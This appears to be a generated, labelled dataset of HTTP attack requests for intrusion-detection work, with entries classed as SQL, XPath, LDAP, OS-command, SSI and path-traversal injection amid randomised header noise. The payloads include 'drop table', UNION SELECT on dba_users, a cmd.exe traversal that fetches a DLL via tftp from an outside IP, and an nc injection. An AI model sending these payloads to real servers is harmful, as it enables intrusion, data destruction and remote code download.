null

End - Id: 41095
Start - Id: 41564
class: SqlInjection
GET /eAhbnahrgtmdo9hwrenn/bdbPanandkscript3@Kh/3Tie3pam/qEmehzohoeohcvbinkno/gg/XCfiPHT4ntr/hodoaawibtngtst/d83tmocsboeRudIIeth/hi1eeOh4tloot/itL/iperloOMGFx.O.R./rplOTHO4XRdpMrcW3@EO.jpg?4e=%27%3B+++++drop+++table++admin HTTP/1.1
Host: 62.212.18.127
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 22.16.9.166
Cookie: ATinputE9vbscript@yphpZXI=uzBJcerepdu;WsjaanisseesIy=ucbt5;X6eams=eeinputadhagieen4;taRlihdmUxasyh=nullshHeform di7sN;tuloarxm=s7gtsnis&l8;ttOe=SxelpnhDss
Cookie2: $Version="102"
Date: Fri, 24 Mar 06 09:47:18 GMT
Expect: oAcs=EcpeLe
From: usaacy07@scsi6.be
If-Modified-Since: Thu, 28 Jan 10 09:51:00 CET
If-Unmodified-Since: Thu, 07 Jan 10 16:27:42 CET
If-Match: *
If-None-Match: "8WENARQdVZLlky.6w"
If-Range: Thu, 26 Apr 07 11:16:55 CET
Max-Forwards: 046
MIME-Version: 3.9
Pragma: 1n=tn
Proxy-Authorization: NTLM b2xzb3NobDl0dG9mbWpvZTJmc2VmczJlZWhlZm10cWV0aHN1bGNvNmliZDg=
Authorization: Basic clRzYWV0OnN0dG5ub3E=
Range: 629953-,-3
Referer: http://www.aesiueno.com/mcthe9.msf
TE: trailers,gzip,chunked
Trailer: If-Range
User-Agent: e54tOCanZ@ http://www.znara3e.cz
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1852x515
Via: HTTP/9.9 181.191.40.93, 9.3 243.126.203.94
Transfer-Encoding: tuEad; aeweT3es=A5neta
Upgrade: 1uitte/1.5, Ore6/5.0
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41564
Start - Id: 35901
class: XPathInjection
PUT /WOA2B2zly.Areplace4/r1sftc/n9vZO/8hlzua/Uet02/hre9bcYfenub8lUgOg/aP4pGAh2r/iqai/mXyjZCNgiKNFXQR1EU/70ugKbgsoundZ6l/q_d0ghJpdivL34K/zmm3lrrTji7mAIf.htm? HTTP/1.1
Content-Length: 131
Content-Language: c,sswde,eaav
Content-Encoding: identity
Content-MD5: TG5ObTFzclRvb2V0b2F1cg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Aug 05 15:56:36 GMT
Last-Modified: Tue, 12 Aug 08 06:52:31 CET
Host: 49.176.41.46
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Date: Wed, 17 Aug 05 09:53:52 UTC
ETag: W/"iImJMbHSDZxy8ftSG4q"
Expect: 100-continue
If-Unmodified-Since: Thu, 21 Jan 10 14:02:46 CET
If-Match: "f5Ppcu05_j9XhoASb6k"
If-None-Match: "wyJwU9AOTabNGIc"
If-Range: Thu, 19 Feb 09 06:25:07 CET
Max-Forwards: 5967
Pragma: no-cache
Authorization: NTLM dGlXcVRjc29vdXVrcDl1dGh4dG5rZWhlYW5seXVHUW9ldHlIeWgwbEE=
Referer: http://www.oouhh.st/llFeItse/oraaoTo/Lerseeeh/anHtttl/Tzisna5.mdb
Trailer: Upgrade
User-Agent: 22  or  count(path/child::node()[position()=((i+j+k+l+1)]   | path/child::*()[position()=(k+1)])=1 or    132=
UA-OS: Win95
Transfer-Encoding: compress
Warning: 006 193.174.255.193:622 "3tta0" "Sun, 25 Dec 05 02:22:56 UTC"
X-Forwarded-For: 104.3.78.75

eo=15537&7yX_SMmAB=elrnidzbIi1d&us=suinr&jfromti=9271560&dah2=i2i&Axo1bawtr=0img-&osze3ontme=sIuu9eXbeedmo&x1documentFdO.@A3@=09519

End - Id: 35901
Start - Id: 44167
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0
Host: www.ltllsdh4s.cz
Connection: keep-alive
Accept: video/quicktime, image/png
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: B-rocm, eNS-alhcH;q=0.9, t4oa-Shocns;q=0.6, asntnrfM-ot4eq8, uJeitelb-5nltdycp
Cache-Control: no-transform
Client-ip: 21.12.224.178
Cookie: dafn40oacsNpggH=tetcexecayttf]dwautoexecoc %e;R3cd1HoLepe=tNtShn;A9necwknetrn=mvar
Cookie2: $Version="13"
Date: Thu, 18 Feb 10 11:11:19 UTC
ETag: W/"aTOdrmXsUZHyRCr-F"
Expect: uZat4lfl=YdgRc;nrwdee
From: ejtot@nhhlptpni.net
If-Modified-Since: Wed, 16 Apr 08 16:49:15 GMT
If-Unmodified-Since: Thu, 26 Jul 07 10:42:32 CET
If-Match: *
If-None-Match: "nNZaNQElM_xY-TcR3F92"
If-Range: *
Max-Forwards: 78
MIME-Version: 3.5
Pragma: aoetD4=bs
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: Basic ZXhub2xhaDp0clVzOWU3
Range: 13627-239
Referer: /rtqxai/virB/uAnr3n/eeyelepG.bin
TE: trailers,deflate;q=0.2,chunked;q=0.0
Trailer: Accept-Language
User-Agent: Mozilla/5.6 (X11; U; Open BSD i386 7.8; ae-ot; rv:7.7.8) Gecko/67675464
UA-CPU: 68000
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 884x0554
Via: lte6ja/6.7 www.ziok.png
Transfer-Encoding: compress
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 195.218.223.142
X-Serial-Number: 50318927121848032
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44167
Start - Id: 49412
class: XPathInjection
GET /tG_a/j4MmznWuZ4d6w8/ta6eaueqcmSN1eOfqba/ylSsJ5c/iq7xKtF4q8tQ.O1VX/sEwhieEMwnT.cgi?FqK7Zegylj5=Ntiegttg%27+++++or++++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28+++i%2B+j++%2Bk+%2B++l+%2B++1%29%5D+++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++%27tjiceoie%27+%3D++%27+bu5sa%27+++++or&newdihherrye=trtbkmahthe6e&jOgoe0AEdns=ib%24koeWed+Deti HTTP/1.1
Host: 50.113.177.20
Connection: keep-alive
Accept: text/*, image/png, video/*
Accept-Charset: big5;q=0.7, iso-8859-15;q=0.1, windows-874
Accept-Encoding: gzip, deflate;q=0.7, gzip;q=0.5
Accept-Language: tEeay-njedEeeh, eoaP-i, ereca-t
Cache-Control: only-if-cached
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="9"
Date: Mon, 27 Jun 05 22:57:03 UTC
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: a1tnai
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 27 Mar 04 09:12:39 CET
If-Unmodified-Since: Fri, 22 Dec 06 12:56:08 GMT
If-Match: *
If-None-Match: "E-nGSIqObLIpJjzc"
If-Range: Tue, 30 Dec 08 12:12:58 CET
Max-Forwards: 41
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic bmhvaW9vOnR0bm9zdTY=
Authorization: o6hk nUnoo9=kdsnx
Range: 93-251960,-7919
Referer: http://www.nreev.it/samsu/oDswe/AKuO/ruo9de.jsp
TE: trailers,gzip
Trailer: Cache-Control
User-Agent: Mozilla/8.6 (X11; U; SunOS sun4u 3.7; id-35; rv:2.2.7) Gecko/34856681
UA-CPU: StrongARM
UA-Disp: 422,204,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.rnel.jpg, culrLe/8.7 131.60.168.121
Transfer-Encoding: compress
Upgrade: dec/5.5, 4kklt/1.7
Warning: 522 www.54hoek.jpeg "olttkenin" 
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49412
Start - Id: 43392
class: OsCommanding
GET /wIioaEI03nen3rahvtNl/ntni/oadiu9ahq/Kz-/eauU/ncMaht/ehoeyeHItgS/srorl7sei5ztHt/eR8v@dW8cLt-c.jpg?nooeGee=icw2esspynDe&i4aa=rcuE3lheyajoatl8fT&Yjoha1ektSfec=%250a+++nc+++www.nsmeonnang.com++++80+++++%3B&2kP10AES5e=tnrnoacN%25%7Ew+%3Dn&8l4aaail=d6rhomliwars&dbodyoRq3Wyhp4stdin=877&w9FE6mnG2T=15286546&nscce=hoXsG3AkR3&rsgoohpdW=523&2ih9eac=2D6t3r&4D8Ce=t%3Be&o00lkns=i HTTP/1.0
Host: 205.31.0.242:80
Connection: close
Accept: image/png;q=0.1, text/html;q=0.3, video/mpeg
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, gzip
Accept-Language: hwtea3s-Tc;q=0.4, usfe-6ense;q=0.2, qrbhf-anomwyca
Cache-Control: no-transform
Client-ip: 143.76.65.70
Cookie: yshDcsma=3959454;ms=wheresamall;rDtwsy=nxterm;mgeve7i=1;wfsq=/oowv
Cookie2: $Version="82"
Date: Fri, 06 May 05 14:03:52 CET
ETag: W/"AMQ50BgW5OZswZc"
Expect: 100-continue
From: no4b@rasantepan.ch
If-Modified-Since: Fri, 23 Nov 07 17:45:06 CET
If-Unmodified-Since: Fri, 27 Oct 06 22:01:20 GMT
If-Match: "v8gUMR38inclouEVOl"
If-None-Match: *
If-Range: Wed, 10 Mar 04 03:56:06 GMT
Max-Forwards: 1040
MIME-Version: 6.9
Pragma: kru='thti8eng'
Proxy-Authorization: Basic dXNTYmEwOmVlc2g2
Authorization: jFai datreoe=HDzlui
Range: -4315,8885-439,063-
Referer: /iAdn/pidwf/Meoleyot.cgi
TE: trailers,trailers,gzip;q=0.9
Trailer: If-Modified-Since
User-Agent: nbsio/7.3.7.5
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: FTP/5.0 84.218.27.189
Transfer-Encoding: gzip
Upgrade: 37mj/0.5, lgeOa/4.4, ot2tcN/1.9, rat/6.0, EpB/9.2
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43392
Start - Id: 46224
class: PathTransversal
GET /ltbafapoaI/pOFAw3MZYBlCZ/wir8o/q0tpVWo7nZrVn74eja/aOeODbKHz.shtml?ordm@JwG=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2F3rCnG9.conf HTTP/1.0
Host: www.aipcpeaco.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress, compress;q=0.4
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 184.19.40.250
Cookie: JDFvSPBSdR=zennmoTAeolxrE9Iri;SRP9NgMy0=6Of9tuhncgrm;jets=935373;7N2hye4ypda=EeO4t;nnrseeti=ildIZHSg7;Qllgp=44
Cookie2: $Version="374"
Date: Sat, 16 Aug 08 15:47:25 GMT
ETag: W/"T3S71sqPNBzZRCk"
Expect: 100-continue
From: xeibsrh@cIoaz0o30a.fr
If-Modified-Since: Mon, 24 Jan 05 03:06:21 UTC
If-Unmodified-Since: Sun, 06 May 07 01:41:23 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 733
MIME-Version: 1.9
Pragma: tinn2l=e
Proxy-Authorization: nuit ePlSnli=Ews6alar
Authorization: Basic b2VpbzpIcGhyZQ==
Range: 3-320
Referer: /pmoeasa/ytieeyL.jpeg
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: slchpc (utbK4b; t6yjG.mwBu; hCfQ.8zvI; 1X-sJW; w4.hdt0)
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6581x3968
Via: HTTP/6.2 37.139.61.164
Transfer-Encoding: gzip
Upgrade: esjpot/5.8, eni/8.5, tytox8/4.9
Warning: 677 234.22.108.123:360 "tgee6rvkuora" "Mon, 22 Jun 09 20:41:00 CET"
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46224
Start - Id: 38761
class: LdapInjection
GET /i1oa.css?nns5midhbslL=+sifwhol&DaewnA=+ou&etnsi=eetcrsU&ithre=%29++%28++++%7C++%28displayName%3Dhad*%29++++%28name++++%3Dhad*++%29%28+mail%3Dhad*+%29&hjtfy8m=7etthhtirdaIe&ydc4Ne=anFF HTTP/1.1
Host: 115.186.136.235
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 185.134.129.220
Cookie: 4gleyt=704144;dakdLrteierab=tO5
Cookie2: $Version="4"
Date: Tue, 24 Jan 06 16:03:22 GMT
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: jhiihuo=5eokc
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 02 May 06 15:44:31 GMT
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: "04Jj6asrCLCUaQfynbO"
Max-Forwards: 4927
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: NTLM c3JvdGV1M0UzZVJmMThtYXVBcGxlbmVUbjNOZGR4Zm9oc0Ewc2w=
Range: 66-7077,754235-107,-0401
Referer: http://uaago.gov/n0ni/msft9ct/diPeqiTe.png
TE: trailers,gzip;q=0.1,trailers
Trailer: Accept
User-Agent: 6skAee7o (rQo1x2i; eQ60vVPQSo; oqdfMdow; niChwStk; hba6Ak)
UA-CPU: Sparc
UA-Disp: 372,5525,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8698x991
Via: FTP/8.2 www.bsoflia.jpg, 5.4 www.eeags.png
Transfer-Encoding: gzip
Upgrade: qUr/2.7, rRt/2.0, b9eynm/6.6, RsT6/5.1
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 15.223.231.187
X-Serial-Number: 99237184639
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38761
Start - Id: 41299
class: SqlInjection
GET /eSgwrhs/3hwaZ8-Q.2v/hXWHOmyh@z4XyCKYUa1G/Szmbodylv@R7/mt4R4tbFo7m47WeXK/E@7/steie9egatiy4thSAa/yaoE/nR1Lpaaqe3/qiL8YH_vAHYAPdQ2I9.tiff? HTTP/1.0
Host: www.w6ijmnmoms.com:88776
Connection: e2rlyeE
Accept: application/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tco7mt-twnsoa, orcqlPe-ohvtwtts, oni-6ntee1
Cache-Control: no-cache
Client-ip: 97.182.86.80
Cookie: mailvvCdeleteVUsO=4e~divi+l;weOsct=90580521;at=2stgtifEslpfo;0DftphttpGw=')     UNION   ALL   SELECT   rQsfset     , 9l     ,  xerG1ia9     FROM     m5   WHERE   kghdeaDn  NOT    IN     (   'dePYe'   )    AND   vhu  NOT    IN    ('ilte0s'   )    AND  ''    =    ';cwae8yeb=50;ar=l9s
Cookie2: $Version="3"
Date: Wed, 16 Dec 09 22:53:48 GMT
ETag: "JhjNr2i1GthRTBS"
Expect: s5Ejl
From: 7jtnsEc@oHtbtu9a.biz
If-Modified-Since: Sun, 15 May 05 21:05:45 GMT
If-Unmodified-Since: Sat, 16 Sep 06 01:55:13 UTC
If-Match: *
If-None-Match: "O08G@4g2lzSxanf"
If-Range: "ZngsAy@qzioANsPbQt0"
Max-Forwards: 733
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: sphut6 wrea2wE=mdHeht3e
Authorization: Digest algorithm=bonEh
Range: 1-,9-8
Referer: /Sakdu.nsf
TE: gzip
Trailer: User-Agent
User-Agent: Mozilla/7.8 (compatible; tosdre; Win 9x; doe5nFa; pltf)
UA-CPU: MIPS
UA-Disp: 8902,8291,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 470x0638
Via: 5.8 195.97.144.183, HTTP/7.5 221.13.16.68:0807, FTP/0.9 www.q9ohatqe.jpg
Transfer-Encoding: deflate
Upgrade: e1em/3.9, othbu/3.3, yin/5.4, shfedi/0.7
Warning: 991 www.oeOiE.shtml:7 "iedetaN" 
X-Forwarded-For: 0.5.238.60
X-Serial-Number: 99307036492325759306
----: ----------------------------

null

End - Id: 41299
Start - Id: 35597
class: XPathInjection
GET /oz/alo8lteeinpiry8/Enpprocessing-instruction-/v6/iKZXwIdue4n.gif?adudne=childt%29eposition&ris=foDr8&tais=aHF&n3Ef9c4metag=uxL71pNQUHz&etei=r.9&-y-I=sdsl2s&OUthebAhro8h=Itylah%2Fnetq%2Fric%2Fchild%3A%3Anode%28%29%5B+++++position%28%29%3D61%5D+++%7C++++tm8znw%2FaEeli2%2Fewo%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D115%5D++or+++++%27oeym%27++%3D%27&0isoqqperrtdc=ytAcozvetw6o0als HTTP/1.0
Host: www.rpipacrio.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.8, identity;q=0.4, compress;q=0.4, identity
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 180.187.68.18
Cookie: oreeinzeto4r8e=eoytn;gthmeep=ptdsId;triSOciurzkett=o-OJqtDGNqA;nhuqx=0;9rteazee=tf-J.i5fA;uvVqmc=Ose
Cookie2: $Version="98"
Date: Mon, 19 Jul 04 11:53:42 UTC
ETag: "2IZLr6UCFS8Snl6TN"
Expect: 100-continue
From: hsgss@kOcgeesht.ch
If-Modified-Since: Sat, 24 Jun 06 20:37:15 UTC
If-Unmodified-Since: Wed, 17 Oct 07 10:23:02 UTC
If-Match: "ShnD2NkYPCwI-Pnxb"
If-None-Match: "rwOo.Tuonx4ayEEa"
If-Range: Mon, 26 Feb 07 17:08:41 CET
Max-Forwards: 084
MIME-Version: 4.7
Pragma: msAtteao='pfv'
Proxy-Authorization: NTLM b2RXcmx2M25sdGE2b3dvcmVIaGxuZWh5b2lzdGlXWGRvdnlvUm0xZXQxbU8zYm0=
Authorization: Basic WXBkYWVkOmhlOWVkbmVu
Range: 1278-6
Referer: http://www.tetmst.be/tieaej.sh
TE: trailers
Trailer: Warning
User-Agent: Mozilla/3.0 (compatible; MSIE 1.2; Solaris; 0Iesq; wOo3; uS9e1c)
UA-CPU: 68000
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 138x439
Via: 6.9 www.pa3eVo.css, nrop4/9.3 www.aeas.gif:883, 1.7 www.yfewB.jpeg
Transfer-Encoding: compress
Upgrade: anfbe/0.9, m2ntt/2.0
Warning: 204 197.17.40.24 "eS4aShneveaeoeqAni" "Sun, 06 Nov 05 19:18:19 CET"
X-Forwarded-For: 93.7.188.203
X-Serial-Number: 65275952070459353
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35597
Start - Id: 42167
class: SqlInjection
GET /aA3gyxT-/6EyeI/hjJftgxPfOMRi/lFROBB05nWbyF/7NjGV2jhsamMO@E/Zdposition/l0taefeowaTsHsAvsn/ezHqco3T/ge3e/tKEkP@4YMsZ.PBYFcM71/iaueetaieEcodo/grirssdhi.nsf?P76Sb1zwgetz3nI=5796&rmeidXformiubl2=chairs%27++UN%2F**%2FION+++SEL%2F**%2FECT+skemornaa+FROM+++dba_users+WHERE+hnhtgo++like+%27%2525&aa4Tn=y%3Ab&5e2naeadEytt=n&gsaaRiotzweuUt=eneNmnewntIa6rndn&JJMPVWDorATZf=+p7 HTTP/1.0
Host: 210.149.39.67
Connection: keep-alive
Accept: audio/basic;q=0.6, audio/*;q=0.1, text/xml
Accept-Charset: x-mac-roman, x-mac-arabic
Accept-Encoding: 
Accept-Language: aa-rs;q=0.4, usse-ae;q=0.3, oee-rw;q=0.4, 4etaa-ednncl6
Cache-Control: no-cache
Client-ip: 61.45.209.154
Cookie: tg0za=5229;feheel1cb=tf1nGRFQ;hoaGo= ql |oad'niblhi7bgsoundt
Cookie2: $Version="82"
Date: Tue, 12 Apr 05 06:16:54 UTC
ETag: "rmoKgaJRhzxXhz04d"
Expect: 100-continue
From: tktabU@4ahlq0ig.org
If-Modified-Since: Mon, 21 Apr 08 09:51:44 GMT
If-Unmodified-Since: Mon, 23 Jun 08 07:34:32 UTC
If-Match: "qzErx0iuSy5UmjaM3iww"
If-None-Match: *
If-Range: Wed, 23 Mar 05 22:21:25 GMT
Max-Forwards: 49
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic aWVuejQ6NmluSWls
Range: -65233,-6365
Referer: /ynoGyrl/esre/pel5nNn.cfm
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/7.6 (Machintosh; U; PPC 5.0; ad-wa; rv:5.4.7) Gecko/92561428
UA-CPU: StrongARM
UA-Disp: 878,4036,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: HTTP/9.3 114.145.212.175, 7.9 153.253.174.161:86
Transfer-Encoding: deflate
Upgrade: tNMgnj/4.8, 6nig/6.9, f01otg/5.4
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42167
Start - Id: 42313
class: SqlInjection
GET /6RgUnode3mpV6/eJ4MMP4lscQrs7Oo/e6AtgrrT.asp?imgqLtmbodympP=aUlDWe8&heeHdNodcstan=kMM66M&st4fSaemAsvi2r=esqexQ&fRB1B=OR+++3996%3D3996 HTTP/1.0
Host: www.hhpsneahye.fr
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 50.218.71.30
Cookie: is2qnrniENrlSl=egrneseattd6rrmayl;QdK@=tntphbk;euIn2MseohiTse=rr7n;LOperl-=l38ZPBwvoc;salmD8ce1tbado=e ws@efyet@Odpasswd
Cookie2: $Version="134"
Date: Tue, 26 Dec 06 23:33:09 GMT
ETag: "3b.fk.WCMYAXJiT2"
Expect: nlsq
From: h5dt@dgwd.cz
If-Modified-Since: Sun, 25 Sep 05 06:28:58 CET
If-Unmodified-Since: Thu, 20 Jul 06 18:19:51 CET
If-Match: *
If-None-Match: "lUwiy4XMBqqwuBzE-9O"
If-Range: Fri, 26 May 06 01:59:13 GMT
Max-Forwards: 2960
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: NTLM aG5sc2RkdDd0MWllczJRazdhYTNpcmM1d2xpZXRvNXhpbmVpbjNiRW9pbA==
Range: -87,-776,05-6302
Referer: http://tiVgs.cz/mqdwrtt/le2tyson/nost2nA.png
TE: deflate
Trailer: Accept-Encoding
User-Agent: eornvoi86s (uK9-mrS6X)
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4371x6437
Via: 4.2 55.207.170.82, 4.0 188.152.14.120
Transfer-Encoding: f7jq
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 797 57.31.42.175 "ddh8os78iba" "Mon, 22 Aug 05 11:07:24 UTC"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42313
Start - Id: 40829
class: SSI
GET /pAfEj6EIwA/6YdHYYtLEkdi3Tq6KE/a3fc5sgW7YoeqCalmeV/i.I0aldS9jgL1c/huo/cPBg6ywYemep/eB/UsQSlGV-2PLpM/pS5ukXX6fzCsystemZ/apzt53bQh3HZaAVuPDi/vMJ8_a8.G2j8/n2gnos.dll?cozwnL=%3C%21--+++%23odbc+connect%3D%22geatS%2Ca4%2Cews%22++++++statement%3D%22select+*++++from+eae%22--%3E HTTP/1.0
Host: www.Eu27Mnom.org
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.8, iso-8859-2;q=0.0, iso-8859-6, iso-8859-8-i;q=0.0, iso-8859-8
Accept-Encoding: gzip;q=0.9, gzip;q=0.4, compress, compress, compress
Accept-Language: Poettbh-hls2e, tdbbPi-Jocnja1R, HsR-ju;q=0.2, cs-xote;q=0.7
Cache-Control: no-store
Client-ip: 14.119.231.70
Cookie: wys5bazh7rcet=keEcr26wieMeo92
Cookie2: $Version="4"
Date: Fri, 26 Jun 09 08:26:19 UTC
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: oulsi
From: heeo2q@daRia.de
If-Modified-Since: Wed, 26 Sep 07 05:29:03 UTC
If-Unmodified-Since: Fri, 20 Mar 09 13:48:03 UTC
If-Match: "mrPqMKGkuO.X6dJp"
If-None-Match: "rZc1_isaOo7r18Hs."
If-Range: Mon, 18 Feb 08 04:09:16 CET
Max-Forwards: 4632
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Basic T2FudGFoOm90Z3hsZW93
Range: 4-703669
Referer: /lbspasr8/arrft/atoel/buu7kee/nNrj.jpg
TE: gzip;q=0.0,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: eatug/1.6.7.9.7
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 938x7282
Via: 3.4 www.tT7mt.js, HTTP/6.1 172.184.157.236:3, arc/4.4 211.26.131.165
Transfer-Encoding: gzip
Upgrade: tU7st/9.0, tata/7.6, nhs/2.5, attto/4.3, a7pt/7.6
Warning: 627 147.97.235.80:0740 "auhimyejsitdsrd" "Fri, 07 Jul 06 12:59:41 UTC"
X-Forwarded-For: 213.213.96.18
X-Serial-Number: 40747153756954
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40829
Start - Id: 35415
class: SqlInjection
GET /7UErDVWz/e_2RZWXi40/i2nr2uneKnouaablo/v66mw.7/lqQ/3TkO/dP/fvo/ak0vi2Wy3.gMxCInZf.css?egtyslh=760357&eersNeAabosr=79020227&taiavestrpty=434&X3nK2=%27+++OR++++%27egienatsaer%27+++%3E+++%27S&2k-nph-Ph=usdaaoie&XBhMr5m=gigsnph-vly HTTP/1.1
Host: 143.249.11.48
Connection: close
Accept: text/*;q=0.3, video/*
Accept-Charset: utf-7;q=0.2
Accept-Encoding: 
Accept-Language: seeber-dsroix, ptrmmk-7aq, rr4t-dv;q=0.8, r-ECo
Cache-Control: max-age=2521
Client-ip: 67.105.71.5
Cookie: replaceCyMrcpbYJ=srta7ttduurten;meetNmS9dssb=nskp4qdq;RyPmhTMbNxI6=5013294757;hxtdloxyeaG=hD3eB6.
Cookie2: $Version="22"
Date: Tue, 19 Aug 08 14:29:59 CET
ETag: W/"Tt-n2t9gA2mK-4fFk"
Expect: 0tsatea
From: meCo6@c0Onn.it
If-Modified-Since: Thu, 19 Jan 06 19:15:55 UTC
If-Unmodified-Since: Thu, 25 Feb 10 24:32:53 GMT
If-Match: "8RG49iRCVabQ3Crs"
If-None-Match: "kIopZ_T@-PF40pP-e"
If-Range: Tue, 06 Mar 07 23:10:38 UTC
Max-Forwards: 53
MIME-Version: 9.6
Pragma: et=Hiyii65
Proxy-Authorization: Basic YXdpZHY6dzV0cHNoZnI=
Authorization: Digest username="omqlido"
Range: -236
Referer: /sB6O/tne7lhgg/OhLcpps/eieh.cgi
TE: chunked;q=0.3,trailers,gzip
Trailer: Accept-Encoding
User-Agent: aneheuoq (m-i6K0zE2x; l9evoNrJE)
UA-CPU: Sparc
UA-Disp: 8983,827,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: FTP/8.5 www.TeDamv.css
Transfer-Encoding: deflate
Upgrade: geD5/1.4, sat/3.0, otQ/7.5, aoiw/6.4
Warning: 292 225.163.120.85 "z0feceldn" "Sat, 14 Oct 06 01:35:25 UTC"
X-Forwarded-For: 165.157.207.111
X-Serial-Number: 281340124
----: ------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 35415
Start - Id: 49917
class: XPathInjection
